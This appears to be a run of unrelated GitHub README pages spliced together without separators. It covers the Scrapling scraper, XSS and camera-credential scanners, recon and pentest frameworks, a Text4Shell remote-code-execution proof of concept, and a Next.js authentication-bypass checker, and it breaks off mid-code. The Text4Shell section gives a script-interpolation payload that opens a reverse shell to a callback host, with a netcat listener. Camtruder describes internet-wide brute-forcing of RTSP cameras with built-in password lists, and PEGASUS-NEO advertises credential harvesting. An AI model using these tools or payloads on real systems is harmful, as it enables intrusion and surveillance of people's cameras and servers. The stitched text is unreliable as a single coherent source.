[<data='<p class="price_color">Β£51.77</p>' parent='<div class="product_price"> <p class="pr...'>,
<data='<p class="price_color">Β£53.74</p>' parent='<div class="product_price"> <p class="pr...'>,
<data='<p class="price_color">Β£50.10</p>' parent='<div class="product_price"> <p class="pr...'>,
<data='<p class="price_color">Β£47.82</p>' parent='<div class="product_price"> <p class="pr...'>,
...]
Find all elements that are similar to the current element in location and attributes
# For this case, ignore the 'title' attribute while matching
>>> page.find_by_text('Tipping the Velvet').find_similar(ignore_attributes=['title'])
[<data='<a href="catalogue/a-light-in-the-attic_...' parent='<h3><a href="catalogue/a-light-in-the-at...'>,
<data='<a href="catalogue/soumission_998/index....' parent='<h3><a href="catalogue/soumission_998/in...'>,
<data='<a href="catalogue/sharp-objects_997/ind...' parent='<h3><a href="catalogue/sharp-objects_997...'>,
...]
# You will notice that the number of elements is 19 not 20 because the current element is not included.
>>> len(page.find_by_text('Tipping the Velvet').find_similar(ignore_attributes=['title']))
19
# Get the `href` attribute from all similar elements
>>> [element.attrib['href'] for element in page.find_by_text('Tipping the Velvet').find_similar(ignore_attributes=['title'])]
['catalogue/a-light-in-the-attic_1000/index.html',
'catalogue/soumission_998/index.html',
'catalogue/sharp-objects_997/index.html',
...]
To increase the complexity a little bit, let's say we want to get all books' data using that element as a starting point for some reason
>>> for product in page.find_by_text('Tipping the Velvet').parent.parent.find_similar():
print({
"name": product.css_first('h3 a::text'),
"price": product.css_first('.price_color').re_first(r'[\d\.]+'),
"stock": product.css('.availability::text')[-1].clean()
})
{'name': 'A Light in the ...', 'price': '51.77', 'stock': 'In stock'}
{'name': 'Soumission', 'price': '50.10', 'stock': 'In stock'}
{'name': 'Sharp Objects', 'price': '47.82', 'stock': 'In stock'}
...
The documentation will provide more advanced examples.
Let's say you are scraping a page with a structure like this:
<div class="container">
<section class="products">
<article class="product" id="p1">
<h3>Product 1</h3>
<p class="description">Description 1</p>
</article>
<article class="product" id="p2">
<h3>Product 2</h3>
<p class="description">Description 2</p>
</article>
</section>
</div>
And you want to scrape the first product, the one with the p1
ID. You will probably write a selector like this
page.css('#p1')
When website owners implement structural changes like
<div class="new-container">
<div class="product-wrapper">
<section class="products">
<article class="product new-class" data-id="p1">
<div class="product-info">
<h3>Product 1</h3>
<p class="new-description">Description 1</p>
</div>
</article>
<article class="product new-class" data-id="p2">
<div class="product-info">
<h3>Product 2</h3>
<p class="new-description">Description 2</p>
</div>
</article>
</section>
</div>
</div>
The selector will no longer function and your code needs maintenance. That's where Scrapling's auto-matching feature comes into play.
from scrapling.parser import Adaptor
# Before the change
page = Adaptor(page_source, url='example.com')
element = page.css('#p1' auto_save=True)
if not element: # One day website changes?
element = page.css('#p1', auto_match=True) # Scrapling still finds it!
# the rest of the code...
How does the auto-matching work? Check the FAQs section for that and other possible issues while auto-matching.
Let's use a real website as an example and use one of the fetchers to fetch its source. To do this we need to find a website that will change its design/structure soon, take a copy of its source then wait for the website to make the change. Of course, that's nearly impossible to know unless I know the website's owner but that will make it a staged test haha.
To solve this issue, I will use The Web Archive's Wayback Machine. Here is a copy of StackOverFlow's website in 2010, pretty old huh?Let's test if the automatch feature can extract the same button in the old design from 2010 and the current design using the same selector :)
If I want to extract the Questions button from the old design I can use a selector like this #hmenus > div:nth-child(1) > ul > li:nth-child(1) > a
This selector is too specific because it was generated by Google Chrome. Now let's test the same selector in both versions
>> from scrapling.fetchers import Fetcher
>> selector = '#hmenus > div:nth-child(1) > ul > li:nth-child(1) > a'
>> old_url = "https://web.archive.org/web/20100102003420/http://stackoverflow.com/"
>> new_url = "https://stackoverflow.com/"
>>
>> page = Fetcher(automatch_domain='stackoverflow.com').get(old_url, timeout=30)
>> element1 = page.css_first(selector, auto_save=True)
>>
>> # Same selector but used in the updated website
>> page = Fetcher(automatch_domain="stackoverflow.com").get(new_url)
>> element2 = page.css_first(selector, auto_match=True)
>>
>> if element1.text == element2.text:
... print('Scrapling found the same element in the old design and the new design!')
'Scrapling found the same element in the old design and the new design!'
Note that I used a new argument called automatch_domain
, this is because for Scrapling these are two different URLs, not the website so it isolates their data. To tell Scrapling they are the same website, we then pass the domain we want to use for saving auto-match data for them both so Scrapling doesn't isolate them.
In a real-world scenario, the code will be the same except it will use the same URL for both requests so you won't need to use the automatch_domain
argument. This is the closest example I can give to real-world cases so I hope it didn't confuse you :)
Notes: 1. For the two examples above I used one time the Adaptor
class and the second time the Fetcher
class just to show you that you can create the Adaptor
object by yourself if you have the source or fetch the source using any Fetcher
class then it will create the Adaptor
object for you. 2. Passing the auto_save
argument with the auto_match
argument set to False
while initializing the Adaptor/Fetcher object will only result in ignoring the auto_save
argument value and the following warning message text Argument `auto_save` will be ignored because `auto_match` wasn't enabled on initialization. Check docs for more info.
This behavior is purely for performance reasons so the database gets created/connected only when you are planning to use the auto-matching features. Same case with the auto_match
argument.
auto_match
parameter works only for Adaptor
instances not Adaptors
so if you do something like this you will get an error python page.css('body').css('#p1', auto_match=True)
because you can't auto-match a whole list, you have to be specific and do something like python page.css_first('body').css('#p1', auto_match=True)
Inspired by BeautifulSoup's find_all
function you can find elements by using find_all
/find
methods. Both methods can take multiple types of filters and return all elements in the pages that all these filters apply to.
So the way it works is after collecting all passed arguments and keywords, each filter passes its results to the following filter in a waterfall-like filtering system.
It filters all elements in the current page/element in the following order:
Note: The filtering process always starts from the first filter it finds in the filtering order above so if no tag name(s) are passed but attributes are passed, the process starts from that layer and so on. But the order in which you pass the arguments doesn't matter.
Examples to clear any confusion :)
>> from scrapling.fetchers import Fetcher
>> page = Fetcher().get('https://quotes.toscrape.com/')
# Find all elements with tag name `div`.
>> page.find_all('div')
[<data='<div class="container"> <div class="row...' parent='<body> <div class="container"> <div clas...'>,
<data='<div class="row header-box"> <div class=...' parent='<div class="container"> <div class="row...'>,
...]
# Find all div elements with a class that equals `quote`.
>> page.find_all('div', class_='quote')
[<data='<div class="quote" itemscope itemtype="h...' parent='<div class="col-md-8"> <div class="quote...'>,
<data='<div class="quote" itemscope itemtype="h...' parent='<div class="col-md-8"> <div class="quote...'>,
...]
# Same as above.
>> page.find_all('div', {'class': 'quote'})
[<data='<div class="quote" itemscope itemtype="h...' parent='<div class="col-md-8"> <div class="quote...'>,
<data='<div class="quote" itemscope itemtype="h...' parent='<div class="col-md-8"> <div class="quote...'>,
...]
# Find all elements with a class that equals `quote`.
>> page.find_all({'class': 'quote'})
[<data='<div class="quote" itemscope itemtype="h...' parent='<div class="col-md-8"> <div class="quote...'>,
<data='<div class="quote" itemscope itemtype="h...' parent='<div class="col-md-8"> <div class="quote...'>,
...]
# Find all div elements with a class that equals `quote`, and contains the element `.text` which contains the word 'world' in its content.
>> page.find_all('div', {'class': 'quote'}, lambda e: "world" in e.css_first('.text::text'))
[<data='<div class="quote" itemscope itemtype="h...' parent='<div class="col-md-8"> <div class="quote...'>]
# Find all elements that don't have children.
>> page.find_all(lambda element: len(element.children) > 0)
[<data='<html lang="en"><head><meta charset="UTF...'>,
<data='<head><meta charset="UTF-8"><title>Quote...' parent='<html lang="en"><head><meta charset="UTF...'>,
<data='<body> <div class="container"> <div clas...' parent='<html lang="en"><head><meta charset="UTF...'>,
...]
# Find all elements that contain the word 'world' in its content.
>> page.find_all(lambda element: "world" in element.text)
[<data='<span class="text" itemprop="text">"The...' parent='<div class="quote" itemscope itemtype="h...'>,
<data='<a class="tag" href="/tag/world/page/1/"...' parent='<div class="tags"> Tags: <meta class="ke...'>]
# Find all span elements that match the given regex
>> page.find_all('span', re.compile(r'world'))
[<data='<span class="text" itemprop="text">"The...' parent='<div class="quote" itemscope itemtype="h...'>]
# Find all div and span elements with class 'quote' (No span elements like that so only div returned)
>> page.find_all(['div', 'span'], {'class': 'quote'})
[<data='<div class="quote" itemscope itemtype="h...' parent='<div class="col-md-8"> <div class="quote...'>,
<data='<div class="quote" itemscope itemtype="h...' parent='<div class="col-md-8"> <div class="quote...'>,
...]
# Mix things up
>> page.find_all({'itemtype':"http://schema.org/CreativeWork"}, 'div').css('.author::text')
['Albert Einstein',
'J.K. Rowling',
...]
Here's what else you can do with Scrapling:
lxml.etree
object itself of any element directly python >>> quote._root <Element div at 0x107f98870>
Saving and retrieving elements manually to auto-match them outside the css
and the xpath
methods but you have to set the identifier by yourself.
To save an element to the database: python >>> element = page.find_by_text('Tipping the Velvet', first_match=True) >>> page.save(element, 'my_special_element')
python >>> element_dict = page.retrieve('my_special_element') >>> page.relocate(element_dict, adaptor_type=True) [<data='<a href="catalogue/tipping-the-velvet_99...' parent='<h3><a href="catalogue/tipping-the-velve...'>] >>> page.relocate(element_dict, adaptor_type=True).css('::text') ['Tipping the Velvet']
if you want to keep it as lxml.etree
object, leave the adaptor_type
argument python >>> page.relocate(element_dict) [<Element a at 0x105a2a7b0>]
Filtering results based on a function
# Find all products over $50
expensive_products = page.css('.product_pod').filter(
lambda p: float(p.css('.price_color').re_first(r'[\d\.]+')) > 50
)
# Find all the products with price '53.23'
page.css('.product_pod').search(
lambda p: float(p.css('.price_color').re_first(r'[\d\.]+')) == 54.23
)
Doing operations on element content is the same as scrapy python quote.re(r'regex_pattern') # Get all strings (TextHandlers) that match the regex pattern quote.re_first(r'regex_pattern') # Get the first string (TextHandler) only quote.json() # If the content text is jsonable, then convert it to json using `orjson` which is 10x faster than the standard json library and provides more options
except that you can do more with them like python quote.re( r'regex_pattern', replace_entities=True, # Character entity references are replaced by their corresponding character clean_match=True, # This will ignore all whitespaces and consecutive spaces while matching case_sensitive= False, # Set the regex to ignore letters case while compiling it )
Hence all of these methods are methods from the TextHandler
within that contains the text content so the same can be done directly if you call the .text
property or equivalent selector function.
Doing operations on the text content itself includes
python quote.clean()
TextHandler
objects too? so in cases where you have for example a JS object assigned to a JS variable inside JS code and want to extract it with regex and then convert it to json object, in other libraries, these would be more than 1 line of code but here you can do it in 1 line like this python page.xpath('//script/text()').re_first(r'var dataLayer = (.+);').json()
Sort all characters in the string as if it were a list and return the new string python quote.sort(reverse=False)
To be clear,
TextHandler
is a sub-class of Python'sstr
so all normal operations/methods that work with Python strings will work with it.
Any element's attributes are not exactly a dictionary but a sub-class of mapping called AttributesHandler
that's read-only so it's faster and string values returned are actually TextHandler
objects so all operations above can be done on them, standard dictionary operations that don't modify the data, and more :)
python >>> for item in element.attrib.search_values('catalogue', partial=True): print(item) {'href': 'catalogue/tipping-the-velvet_999/index.html'}
python >>> element.attrib.json_string b'{"href":"catalogue/tipping-the-velvet_999/index.html","title":"Tipping the Velvet"}'
python >>> dict(element.attrib) {'href': 'catalogue/tipping-the-velvet_999/index.html', 'title': 'Tipping the Velvet'}
Scrapling is under active development so expect many more features coming soon :)
There are a lot of deep details skipped here to make this as short as possible so to take a deep dive, head to the docs section. I will try to keep it updated as possible and add complex examples. There I will explain points like how to write your storage system, write spiders that don't depend on selectors at all, and more...
Note that implementing your storage system can be complex as there are some strict rules such as inheriting from the same abstract class, following the singleton design pattern used in other classes, and more. So make sure to read the docs first.
[!IMPORTANT] A website is needed to provide detailed library documentation.
I'm trying to rush creating the website, researching new ideas, and adding more features/tests/benchmarks but time is tight with too many spinning plates between work, personal life, and working on Scrapling. I have been working on Scrapling for months for free after all.
If you likeScrapling
and want it to keep improving then this is a friendly reminder that you can help by supporting me through the sponsor button.
This section addresses common questions about Scrapling, please read this section before opening an issue.
css
or xpath
with the auto_save
parameter set to True
before structural changes happen.Now because everything about the element can be changed or removed, nothing from the element can be used as a unique identifier for the database. To solve this issue, I made the storage system rely on two things:
identifier
parameter you passed to the method while selecting. If you didn't pass one, then the selector string itself will be used as an identifier but remember you will have to use it as an identifier value later when the structure changes and you want to pass the new selector.Together both are used to retrieve the element's unique properties from the database later. 4. Now later when you enable the auto_match
parameter for both the Adaptor instance and the method call. The element properties are retrieved and Scrapling loops over all elements in the page and compares each one's unique properties to the unique properties we already have for this element and a score is calculated for each one. 5. Comparing elements is not exact but more about finding how similar these values are, so everything is taken into consideration, even the values' order, like the order in which the element class names were written before and the order in which the same element class names are written now. 6. The score for each element is stored in the table, and the element(s) with the highest combined similarity scores are returned.
Not a big problem as it depends on your usage. The word default
will be used in place of the URL field while saving the element's unique properties. So this will only be an issue if you used the same identifier later for a different website that you didn't pass the URL parameter while initializing it as well. The save process will overwrite the previous data and auto-matching uses the latest saved properties only.
For each element, Scrapling will extract: - Element tag name, text, attributes (names and values), siblings (tag names only), and path (tag names only). - Element's parent tag name, attributes (names and values), and text.
auto_save
/auto_match
parameter while selecting and it got completely ignored with a warning messageThat's because passing the auto_save
/auto_match
argument without setting auto_match
to True
while initializing the Adaptor object will only result in ignoring the auto_save
/auto_match
argument value. This behavior is purely for performance reasons so the database gets created only when you are planning to use the auto-matching features.
It could be one of these reasons: 1. No data were saved/stored for this element before. 2. The selector passed is not the one used while storing element data. The solution is simple - Pass the old selector again as an identifier to the method called. - Retrieve the element with the retrieve method using the old selector as identifier then save it again with the save method and the new selector as identifier. - Start using the identifier argument more often if you are planning to use every new selector from now on. 3. The website had some extreme structural changes like a new full design. If this happens a lot with this website, the solution would be to make your code as selector-free as possible using Scrapling features.
Pretty much yeah, almost all features you get from BeautifulSoup can be found or achieved in Scrapling one way or another. In fact, if you see there's a feature in bs4 that is missing in Scrapling, please make a feature request from the issues tab to let me know.
Of course, you can find elements by text/regex, find similar elements in a more reliable way than AutoScraper, and finally save/retrieve elements manually to use later as the model feature in AutoScraper. I have pulled all top articles about AutoScraper from Google and tested Scrapling against examples in them. In all examples, Scrapling got the same results as AutoScraper in much less time.
Yes, Scrapling instances are thread-safe. Each Adaptor instance maintains its state.
Everybody is invited and welcome to contribute to Scrapling. There is a lot to do!
Please read the contributing file before doing anything.
[!CAUTION] This library is provided for educational and research purposes only. By using this library, you agree to comply with local and international laws regarding data scraping and privacy. The authors and contributors are not responsible for any misuse of this software. This library should not be used to violate the rights of others, for unethical purposes, or to use data in an unauthorized or illegal manner. Do not use it on any website unless you have permission from the website owner or within their allowed rules like the
robots.txt
file, for example.
This work is licensed under BSD-3
This project includes code adapted from: - Parsel (BSD License) - Used for translator submodule
VulnKnox is a powerful command-line tool written in Go that interfaces with the KNOXSS API. It automates the process of testing URLs for Cross-Site Scripting (XSS) vulnerabilities using the advanced capabilities of the KNOXSS engine.
go install github.com/iqzer0/vulnknox@latest
Before using the tool, you need to set up your configuration:
API Key
Obtain your KNOXSS API key from knoxss.me.
On the first run, a default configuration file will be created at:
Linux/macOS: ~/.config/vulnknox/config.json
Windows: %APPDATA%\VulnKnox\config.json
Edit the config.json file and replace YOUR_API_KEY_HERE
with your actual API key.
Discord Webhook (Optional)
If you want to receive notifications on Discord, add your webhook URL to the config.json file or use the -dw flag.
Usage of vulnknox:
-u Input URL to send to KNOXSS API
-i Input file containing URLs to send to KNOXSS API
-X GET HTTP method to use: GET, POST, or BOTH
-pd POST data in format 'param1=value¶m2=value'
-headers Custom headers in format 'Header1:value1,Header2:value2'
-afb Use Advanced Filter Bypass
-checkpoc Enable CheckPoC feature
-flash Enable Flash Mode
-o The file to save the results to
-ow Overwrite output file if it exists
-oa Output all results to file, not just successful ones
-s Only show successful XSS payloads in output
-p 3 Number of parallel processes (1-5)
-t 600 Timeout for API requests in seconds
-dw Discord Webhook URL (overrides config file)
-r 3 Number of retries for failed requests
-ri 30 Interval between retries in seconds
-sb 0 Skip domains after this many 403 responses
-proxy Proxy URL (e.g., http://127.0.0.1:8080)
-v Verbose output
-version Show version number
-no-banner Suppress the banner
-api-key KNOXSS API Key (overrides config file)
Test a single URL using GET method:
vulnknox -u "https://example.com/page?param=value"
Test a URL with POST data:
vulnknox -u "https://example.com/submit" -X POST -pd "param1=value1¶m2=value2"
Enable Advanced Filter Bypass and Flash Mode:
vulnknox -u "https://example.com/page?param=value" -afb -flash
Use custom headers (e.g., for authentication):
vulnknox -u "https://example.com/secure" -headers "Cookie:sessionid=abc123"
Process URLs from a file with 5 concurrent processes:
vulnknox -i urls.txt -p 5
Send notifications to Discord on successful XSS findings:
vulnknox -u "https://example.com/page?param=value" -dw "https://discord.com/api/webhooks/your/webhook/url"
Test both GET and POST methods with CheckPoC enabled:
vulnknox -u "https://example.com/page" -X BOTH -checkpoc
Use a proxy and increase the number of retries:
vulnknox -u "https://example.com/page?param=value" -proxy "http://127.0.0.1:8080" -r 5
Suppress the banner and only show successful XSS payloads:
vulnknox -u "https://example.com/page?param=value" -no-banner -s
[ XSS! ]: Indicates a successful XSS payload was found.
[ SAFE ]: No XSS vulnerability was found in the target.
[ ERR! ]: An error occurred during the request.
[ SKIP ]: The domain or URL was skipped due to multiple failed attempts (e.g., after receiving too many 403 Forbidden responses as specified by the -sb option).
[BALANCE]: Indicates your current API usage with KNOXSS, showing how many API calls you've used out of your total allowance.
The tool also provides a summary at the end of execution, including the number of requests made, successful XSS findings, safe responses, errors, and any skipped domains.
Contributions are welcome! If you have suggestions for improvements or encounter any issues, please open an issue or submit a pull request.
This project is licensed under the MIT License.
Camtruder is a high-performance RTSP camera discovery and vulnerability assessment tool written in Go. It efficiently scans and identifies vulnerable RTSP cameras across networks using various authentication methods and path combinations, with support for both targeted and internet-wide scanning capabilities.
Raw CIDR output for integration with other tools
Screenshot Capability
Configurable output directory
Location-Based Search
Raw output mode for scripting
Comprehensive Authentication Testing
Credential validation system
Smart Path Discovery
Automatic path validation
High Performance Architecture
Parallel connection handling
Advanced Output & Analysis
go install github.com/ALW1EZ/camtruder@v3.7.0
git clone https://github.com/ALW1EZ/camtruder.git
cd camtruder
go build
# Scan a single IP
./camtruder -t 192.168.1.100
# Scan a network range
./camtruder -t 192.168.1.0/24
# Search by location with detailed output
./camtruder -t london -s
> [ NET-ISP ] [ 192.168.1.0/24 ] [256]
# Get raw CIDR ranges for location
./camtruder -t london -ss
> 192.168.1.0/24
# Scan multiple IPs from file
./camtruder -t targets.txt
# Take screenshots of discovered cameras
./camtruder -t 192.168.1.0/24 -m screenshots
# Pipe from port scanners
naabu -host 192.168.1.0/24 -p 554 | camtruder
masscan 192.168.1.0/24 -p554 --rate 1000 | awk '{print $6}' | camtruder
zmap -p554 192.168.0.0/16 | camtruder
# Internet scan (scan till 100 hits)
./camtruder -t 100
# Custom credentials with increased threads
./camtruder -t 192.168.1.0/24 -u admin,root -p pass123,admin123 -w 50
# Location search with raw output piped to zmap
./camtruder -t berlin -ss | while read range; do zmap -p 554 $range; done
# Save results to file (as full url, you can use mpv --playlist=results.txt to watch the streams)
./camtruder -t istanbul -o results.txt
# Internet scan with limit of 50 workers and verbose output
./camtruder -t 100 -w 50 -v
Option | Description | Default |
---|---|---|
-t | Target IP, CIDR range, location, or file | Required |
-u | Custom username(s) | Built-in list |
-p | Custom password(s) | Built-in list |
-w | Number of threads | 20 |
-to | Connection timeout (seconds) | 5 |
-o | Output file path | None |
-v | Verbose output | False |
-s | Search only - shows ranges with netnames | False |
-ss | Raw IP range output - only CIDR ranges | False |
-po | RTSP port | 554 |
-m | Directory to save screenshots (requires ffmpeg) | None |
[ TR-NET-ISP ] [ 193.3.52.0/24 ] [256]
[ EXAMPLE-ISP ] [ 212.175.100.136/29 ] [8]
193.3.52.0/24
212.175.100.136/29
ββ Found vulnerable camera [Hikvision, H264, 30fps]
β Host : 192.168.1.100:554
β Geo : United States/California/Berkeley
β Auth : admin:12345
β Path : /Streaming/Channels/1
β° URL : rtsp://admin:12345@192.168.1.100:554/Streaming/Channels/1
This tool is intended for security research and authorized testing only. Users are responsible for ensuring they have permission to scan target systems and comply with all applicable laws and regulations.
This project is licensed under the MIT License - see the LICENSE file for details.
Made by @ALW1EZ
Frogy 2.0 is an automated external reconnaissance and Attack Surface Management (ASM) toolkit designed to map out an organization's entire internet presence. It identifies assets, IP addresses, web applications, and other metadata across the public internet and then smartly prioritizes them with highest (most attractive) to lowest (least attractive) from an attacker's playground perspective.
Comprehensive recon:
Aggregate subdomains and assets using multiple tools (CHAOS, Subfinder, Assetfinder, crt.sh) to map an organization's entire digital footprint.
Live asset verification:
Validate assets with live DNS resolution and port scanning (using DNSX and Naabu) to confirm what is publicly reachable.
In-depth web recon:
Collect detailed HTTP response data (via HTTPX) including metadata, technology stack, status codes, content lengths, and more.
Smart prioritization:
Use a composite scoring system that considers homepage status, login identification, technology stack, and DNS data and much more to generate risk score for each assets helping bug bounty hunters and pentesters focus on the most promising targets to start attacks with.
Professional reporting:
Generate a dynamic, colour-coded HTML report with a modern design and dark/light theme toggle.
In this tool, risk scoring is based on the notion of asset attractivenessβthe idea that certain attributes or characteristics make an asset more interesting to attackers. If we see more of these attributes, the overall score goes up, indicating a broader "attack surface" that adversaries could leverage. Below is an overview of how each factor contributes to the final risk score.
200 OK
, it often means the page is legitimately reachable and responding with content. A 200 OK
is more interesting to attackers than a 404
or a redirectβso a 200 status modestly increases the risk.Strict-Transport-Security (HSTS)
X-Frame-Options
Content-Security-Policy
X-XSS-Protection
Referrer-Policy
Permissions-Policy
Missing or disabled headers mean an endpoint is more prone to common web exploits. Each absent header increments the score.
Each factor above contributes one or more points to the final risk score. For example:
Once all factors are tallied, we get a numeric risk score. Higher means more interesting and potentially gives more room for pentesters to test around to an attacker.
Why This Matters
This approach helps you quickly prioritize which assets warrant deeper testing. Subdomains with high counts of open ports, advanced internal usage, missing headers, or login panels are more complex, more privileged, or more likely to be misconfiguredβtherefore, your security team can focus on those first.
Clone the repository and run the installer script to set up all dependencies and tools:
chmod +x install.sh
./install.sh
chmod +x frogy.sh
./frogy.sh domains.txt
https://www.youtube.com/watch?v=LHlU4CYNj1M
____ _ _
| _ \ ___ __ _ __ _ ___ _ _ ___| \ | |
| |_) / _ \/ _` |/ _` / __| | | / __| \| |
| __/ __/ (_| | (_| \__ \ |_| \__ \ |\ |
|_| \___|\__, |\__,_|___/\__,_|___/_| \_|
|___/
ββββ β ββββββ ββββββ
ββ ββ β ββ β ββββ βββ
βββ ββ βββββββ ββββ βββ
ββββ ββββββββ β βββ βββ
ββββ ββββββββββββ βββββββ
β ββ β β ββ ββ ββ ββββββ
β ββ β ββ β β β β β ββ
β β β β β β β β
β β β β β
PEGASUS-NEO is a comprehensive penetration testing framework designed for security professionals and ethical hackers. It combines multiple security tools and custom modules for reconnaissance, exploitation, wireless attacks, web hacking, and more.
This tool is provided for educational and ethical testing purposes only. Usage of PEGASUS-NEO for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state, and federal laws.
Developers assume no liability and are not responsible for any misuse or damage caused by this program.
PEGASUS-NEO - Advanced Penetration Testing Framework
Copyright (C) 2024 Letda Kes dr. Sobri. All rights reserved.
This software is proprietary and confidential. Unauthorized copying, transfer, or
reproduction of this software, via any medium is strictly prohibited.
Written by Letda Kes dr. Sobri <muhammadsobrimaulana31@gmail.com>, January 2024
Password: Sobri
Social media tracking
Exploitation & Pentesting
Custom payload generation
Wireless Attacks
WPS exploitation
Web Attacks
CMS scanning
Social Engineering
Credential harvesting
Tracking & Analysis
# Clone the repository
git clone https://github.com/sobri3195/pegasus-neo.git
# Change directory
cd pegasus-neo
# Install dependencies
sudo python3 -m pip install -r requirements.txt
# Run the tool
sudo python3 pegasus_neo.py
sudo python3 pegasus_neo.py
This is a proprietary project and contributions are not accepted at this time.
For support, please email muhammadsobrimaulana31@gmail.com atau https://lynk.id/muhsobrimaulana
This project is protected under proprietary license. See the LICENSE file for details.
Made with β€οΈ by Letda Kes dr. Sobri
A custom Python-based proof-of-concept (PoC) exploit targeting Text4Shell (CVE-2022-42889), a critical remote code execution vulnerability in Apache Commons Text versions < 1.10. This exploit targets vulnerable Java applications that use the StringSubstitutor
class with interpolation enabled, allowing injection of ${script:...}
expressions to execute arbitrary system commands.
In this PoC, exploitation is demonstrated via the data
query parameter; however, the vulnerable parameter name may vary depending on the implementation. Users should adapt the payload and request path accordingly based on the target application's logic.
Disclaimer: This exploit is provided for educational and authorized penetration testing purposes only. Use responsibly and at your own risk.
This is a custom Python3 exploit for the Apache Commons Text vulnerability known as Text4Shell (CVE-2022-42889). It allows Remote Code Execution (RCE) via insecure interpolators when user input is dynamically evaluated by StringSubstitutor
.
Tested against: - Apache Commons Text < 1.10.0 - Java applications using ${script:...}
interpolation from untrusted input
python3 text4shell.py <target_ip> <callback_ip> <callback_port>
python3 text4shell.py 127.0.0.1 192.168.1.2 4444
nc -nlvp 4444
The script injects:
${script:javascript:java.lang.Runtime.getRuntime().exec(...)}
The reverse shell is sent via /data
parameter using a POST request.
A Python script to check Next.js sites for corrupt middleware vulnerability (CVE-2025-29927).
The corrupt middleware vulnerability allows an attacker to bypass authentication and access protected routes by send a custom header x-middleware-subrequest
.
Next JS versions affected: - 11.1.4 and up
[!WARNING] This tool is for educational purposes only. Do not use it on websites or systems you do not own or have explicit permission to test. Unauthorized testing may be illegal and unethical.
Β
Clone the repo
git clone https://github.com/takumade/ghost-route.git
cd ghost-route
Create and activate virtual environment
python -m venv .venv
source .venv/bin/activate
Install dependencies
pip install -r requirements.txt
python ghost-route.py <url> <path> <show_headers>
<url>
: Base URL of the Next.js site (e.g., https://example.com)<path>
: Protected path to test (default: /admin)<show_headers>
: Show response headers (default: False)Basic Example
python ghost-route.py https://example.com /admin
Show Response Headers
python ghost-route.py https://example.com /admin True
MIT License
Bytes Revealer is a powerful reverse engineering and binary analysis tool designed for security researchers, forensic analysts, and developers. With features like hex view, visual representation, string extraction, entropy calculation, and file signature detection, it helps users uncover hidden data inside files. Whether you are analyzing malware, debugging binaries, or investigating unknown file formats, Bytes Revealer makes it easy to explore, search, and extract valuable information from any binary file.
Bytes Revealer do NOT store any file or data. All analysis is performed in your browser.
Current Limitation: Files less than 50MB can perform all analysis, files bigger up to 1.5GB will only do Visual View and Hex View analysis.
# Node.js 14+ is required
node -v
docker-compose build --no-cache
docker-compose up -d
Now open your browser: http://localhost:8080/
To stop the docker container
docker-compose down
# Clone the repository
git clone https://github.com/vulnex/bytesrevealer
# Navigate to project directory
cd bytesrevealer
# Install dependencies
npm install
# Start development server
npm run dev
# Build the application
npm run build
# Preview production build
npm run preview
Progress bar shows upload and analysis status
Analysis Views
Real-time updates as you navigate
Search Functions
Results are highlighted in the current view
String Analysis
git checkout -b feature/AmazingFeature
)git commit -m 'Add some AmazingFeature'
)git push origin feature/AmazingFeature
)This project is licensed under the MIT License - see the LICENSE.md file for details.
Follow these steps to set up and run the API project:
git clone https://github.com/adriyansyah-mf/CentralizedFirewall
cd CentralizedFirewall
.env
FileUpdate the environment variables in .env
according to your configuration.
nano .env
docker compose up -d
This will start the API in detached mode.
Check if the containers are up:
docker ps
docker compose down
docker compose restart
Let me know if you need any modifications! π
sudo dpkg -i firewall-client_deb.deb
nano /usr/local/bin/config.ini
[settings]
api_url = API-URL
api_key = API-KEY
hostname = Node Hostname (make it unique and same as the hostname on the SIEM)
systemctl daemon-reload
systemctl start firewall-agent
systemctl status firewall-agent
Username: admin
Password: admin
You can change the default credential on the setting page
curl -X 'POST' \
'http://api-server:8000/general/add-ip?ip=123.1.1.99&hostname=test&apikey=apikey&comment=log' \
-H 'accept: application/json' \
-d ''
You can see the swagger documentation on the following link
http://api-server:8000/docs
DB=changeme
JWT_SECRET=changeme
PASSWORD_SALT=changme
PASSWORD_TOKEN_KEY=changme
OPENCTI_URL=changme
OPENCTI_TOKEN=changme
If you find this project helpful, consider supporting me through GitHub Sponsors
OWASP Maryam is a modular open-source framework based on OSINT and data gathering. It is designed to provide a robust environment to harvest data from open sources and search engines quickly and thoroughly.
$ pip install maryam
Alternatively, you can install the latest version with the following command (Recommended):
pip install git+https://github.com/saeeddhqan/maryam.git
# Using dns_search. --max means all of resources. --api shows the results as json.
# .. -t means use multi-threading.
maryam -e dns_search -d ibm.com -t 5 --max --api --form
# Using youtube. -q means query
maryam -e youtube -q "<QUERY>"
maryam -e google -q "<QUERY>"
maryam -e dnsbrute -d domain.tld
# Show framework modules
maryam -e show modules
# Set framework options.
maryam -e set proxy ..
maryam -e set agent ..
maryam -e set timeout ..
# Run web API
maryam -e web api 127.0.0.1 1313
Here is a start guide: Development Guide You can add a new search engine to the util classes or use the current search engines to write a new module. The best help to write a new module is checking the current modules.
To report bugs, requests, or any other issues please create an issue.
Welcome toΒ TruffleHog Explorer, a user-friendly web-based tool to visualize and analyze data extracted using TruffleHog. TruffleHog is one of the most powerful secrets discovery, classification, validation, and analysis open source tool. In this context, a secret refers to a credential a machine uses to authenticate itself to another machine. This includes API keys, database passwords, private encryption keys, and more.
With an improved UI/UX, powerful filtering options, and export capabilities, this tool helps security professionals efficiently review potential secrets and credentials found in their repositories.
β οΈ This dashboard has been tested only with GitHub TruffleHog JSON outputs. Expect updates soon to support additional formats and platforms.
You can use online version here: TruffleHog Explorer
$ git clone https://github.com/yourusername/trufflehog-explorer.git
$ cd trufflehog-explorer
index.html
Simply open the index.html
file in your preferred web browser.
$ open index.html
.json
files from TruffleHog output.Happy Securing! π
Clone the repository: bash git clone https://github.com/ALW1EZ/PANO.git cd PANO
Run the application:
./start_pano.sh
start_pano.bat
The startup script will automatically: - Check for updates - Set up the Python environment - Install dependencies - Launch PANO
In order to use Email Lookup transform You need to login with GHunt first. After starting the pano via starter scripts;
source venv/bin/activate
call venv\Scripts\activate
Visual node and edge styling
Timeline Analysis
Temporal relationship analysis
Map Integration
Connected services discovery
Username Analysis
Web presence analysis
Image Analysis
Entities are the fundamental building blocks of PANO. They represent distinct pieces of information that can be connected and analyzed:
π Text: Generic text content
Properties System
Transforms are automated operations that process entities to discover new information and relationships:
π Enrichment: Add data to existing entities
Features
Helpers are specialized tools with dedicated UIs for specific investigation tasks:
π Translator: Translate text between languages
Helper Features
We welcome contributions! To contribute to PANO:
Note: We use a single
main
branch for development. All pull requests should be made directly tomain
.
from dataclasses import dataclass
from typing import ClassVar, Dict, Any
from .base import Entity
@dataclass
